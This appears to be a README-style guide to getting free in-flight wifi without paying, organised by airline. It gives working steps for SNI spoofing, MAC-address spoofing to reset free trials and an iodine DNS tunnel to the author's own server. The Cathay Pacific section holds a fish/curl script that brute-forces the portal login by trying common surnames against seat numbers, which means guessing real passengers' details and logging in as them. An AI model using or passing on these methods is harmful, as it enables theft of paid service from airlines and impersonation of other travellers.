Airline in-flight wifi crack guide

SNI Spoof is easy & efficient enough. Other tricks won't be included if SNI Spoof works. SNI spoof guide & demo

Airline System Best Method Note
AA SNI Spoof paypal tested
AC SNI Spoof paypal NO DNS, tested
AS SNI Spoof paypal tested
BA SNI Spoof whatsapp not tested, Thanks @xyzxyzxyz
CX Panasonic Brute-force name tested. see below
DL Gogo SNI Spoof paypal tested
DL Viasat SNI Spoof paypal tested
OZ Panasonic DNS Tunnel tested iodine, too slow
BR Panasonic MAC Spoof tested
NH Panasonic SNI Spoof paypal tested
JL Panasonic MAC Spoof not tested
UA Panasonic SNI Spoof paypalobjects tested

Some airline might have multiple different system installed. Double confirm which one is for your flight!

Detailed Notes

AA

DNS works slowly, DNS works slowly. SNI spoof with hardcoded ip works. If not working, please firstly click payment button.

AC

## Air Canada wifi from `https://wifi.inflightinternet.com/app/ifc/splash`:

SNI spoof works.

send HTTPS traffic to any random http server, and modify SNI to paypal.com (or www.paypal.com).

Warning: DNS doesn't work. prepare your DNS record!

If DNS not working with socks5, set ur dns to 1.1.1.1, or proxy dns via proxy.

## Also works for gogo inflight wifi (delta)

SNI spoof works.

DNS works.

DL

no wifi over pacific ocean

new provider Viasat, SNI spoof paypal works.

OZ

# Panasonic

asiana wifi:

ip whitelist:
MPC➜  sh git:(one) ping 1.2.3.5
PING 1.2.3.5 (1.2.3.5) 56(84) bytes of data.
From 172.29.2.27 icmp_seq=1 Destination Net Prohibited
^C
--- 1.2.3.5 ping statistics ---
2 packets transmitted, 0 received, +1 errors, 100% packet loss, time 1000ms

MPC➜  sh git:(one) ping 151.101.197.21
PING 151.101.197.21 (151.101.197.21) 56(84) bytes of data.
64 bytes from 151.101.197.21: icmp_seq=1 ttl=45 time=766 ms
64 bytes from 151.101.197.21: icmp_seq=2 ttl=45 time=807 ms
64 bytes from 151.101.197.21: icmp_seq=3 ttl=45 time=819 ms

dns allowed but proxied, dns tunnel will work.

worth try: fastly CDN fronting:
MPC➜  sh git:(one) ping www.paypal.com
PING cs1150.wpc.betacdn.net (192.229.210.155) 56(84) bytes of data.
64 bytes from 192.229.210.155: icmp_seq=1 ttl=45 time=824 ms

|OZ     |Panasonic|Fastly CDN fronting   |https blocked.. But domain fronting seems to work? will try http next |

iodine howto

while true; bin/iodined -f -c -P rtlgn24bgn 192.168.99.1 dns.896444.xyz ; sleep 10 ; end
# client:  sudo bin/iodine -f -P rtlgn24bgn dns.896444.xyz
#   when testing, add: -r skip UDP direct mode, avoid cheating in test.
# Then sslocal -s 192.168.99.1 -p 25551 -m chacha20-ietf-poly1305 -k default-password -b 0.0.0.0 -l 1080 --fast-open
#      sslocal -s 192.168.99.1:25551 -b 0.0.0.0:1080 -m chacha20-ietf-poly1305 -k default-password  --tcp-fast-open

iodine too slow. Need to test domain fronting (fastly ip, paypal SNI, custom Host) (SNI also dont need to be correct!)

Update Apr 2026: someone said dnstt / slipstream were much faster impl. Try it out if u want.

EVA AIR

# Panasonic

DNS works, but TCP traffic to external server got blocked.

SNI spoof doesn't work. Need to use MAC spoof to renew the 30min trial time.

sudo ip l set wlp2s0 down
sudo ip l set wlp2s0  address 10:11:12:11:12:28
sudo ip l set wlp2s0 up

To share PC wifi with phone, need to create_ap:

nmcli connection modify EVA-WiFi  wifi.band bg wifi.channel 11

> From Internet: they said android could also spoof MAC with `Enhanced Wi-Fi Mac Randomization / Wifi non-persistent MAC randomization` in Developer Options.

NH

Parasonic international flight, unlimited free messaging works fine.

Use SNI=paypal.com spoof, you can visit any website (just kind of slow) ; non 443 works.

JL

1 hour free wifi without hack.

After that, MAC spoof should work, not tested

UA Panasonic

on desktop, make browser window narrower to enable extra option (free messaging + tmobile free wifi)

SNI spoof works with free messaging clicked. www.paypalobjects.com ; non 443 works.

AS

use free message + SNI spoof www.paypal.com.

t-mobile number also works. no SMS required.

CX

verified solution: brute-force last-name + seat num combo

seat map is available in: 
    any movie -> play -> watch together

demo video: https://recolic.net/res/cx-brute-force-name-guide.mkv

demo script:

#### please manually create multiple threads.
## usage: fish this.fish 11 12
## usage: fish this.fish 14 16
## usage: fish this.fish 17 19
## usage: fish this.fish 20 21
#### if you don't like fish, tell GPT to convert to bash.
set -gx prefix (random)

# row 11-12, 14-21
for l in (seq $argv[1] $argv[2])
  for r in A D G K
    for name in wang liu zhang li zhou wu pan xu zhao qian sun zheng jiang zhu chen yuan shen cai long cao tian luo
echo TEST "$l$r $name ..."

# copy from: 1. submit something in brower, 2. F12-right-click copy as curl, 3. modify last line as template. 4. run it
curl 'https://connect.cathaypacific.com/wbs/api/v1/login/third-party/' \
  -X POST \
[PLEASE copy from browser F12... ...]
  --data-raw "authorization=token%3DSFdBKk86MzU6Ik0zXEhpbWFsYXlhXFNoYXJlZFxXQlNBcGlBdXRoXFRva2VuIjo2OntzOjk6IgAqAHNpdGVJZCI7aToxNDQzMTtzOjE2OiIAKgByZW1vdGVBZGRyZXNzIjtzOjEzOiIxMC43NS4xMzMuMTY0IjtzOjEzOiIAKgBtYWNBZGRyZXNzIjtzOjEyOiIwQTAwMEE0Qjg1QTQiO3M6MTE6IgAqAGRldmljZUlkIjtOO3M6MTA6IgAqAGNyZWF0ZWQiO086ODoiRGF0ZVRpbWUiOjM6e3M6NDoiZGF0ZSI7czoyNjoiMjAyNi0wNC0wMSAwNzoyNjo0NC43NTg5MzgiO3M6MTM6InRpbWV6b25lX3R5cGUiO2k6MztzOjg6InRpbWV6b25lIjtzOjM6IlVUQyI7fXM6OToiACoAb3JpZ2luIjtzOjMzOiJodHRwczovL2Nvbm5lY3QuY2F0aGF5cGFjaWZpYy5jb20iO318OGVmZjJlM2JmMjY3ZGUyMTc3MTlkNzU4YzhmMmQ0ZGJmNmJmODczNDc1YTFjZDYzOWRkZTRkM2RkYzViYjM1OA%3D%3D&login%5BfirstName%5D=&login%5BlastName%5D=$name&login%5BseatNumber%5D=$l$r&login%5Bterms%5D=true" > /tmp/out.txt$prefix

# error 652-1702 = wrong answer try again
grep "Internal system exception" /tmp/out.txt$prefix ; and echo "TRY AGAIN" ; and continue
cat /tmp/out.txt$prefix
echo "Possible HIT. rm /tmp/out.txt$prefix to continue..."
while test -f /tmp/out.txt$prefix
  sleep 1
end

    end    
  end
end

note: other solution I have tried / failed

www.alipay.com is a good target.
FORTINET Webfilter blocks SNI spoof with fake cert.
reality should work, but doesnt. I didnt dig deeper.
plain http meek without tls might (unlikely) work... I dont want to try.
system is panasonic

you might be blacklisted after SNI spoof attempt. Just spoof MAC

SNI spoof sometimes (rarely) works over US airspace. Maybe the firewall is in ground station?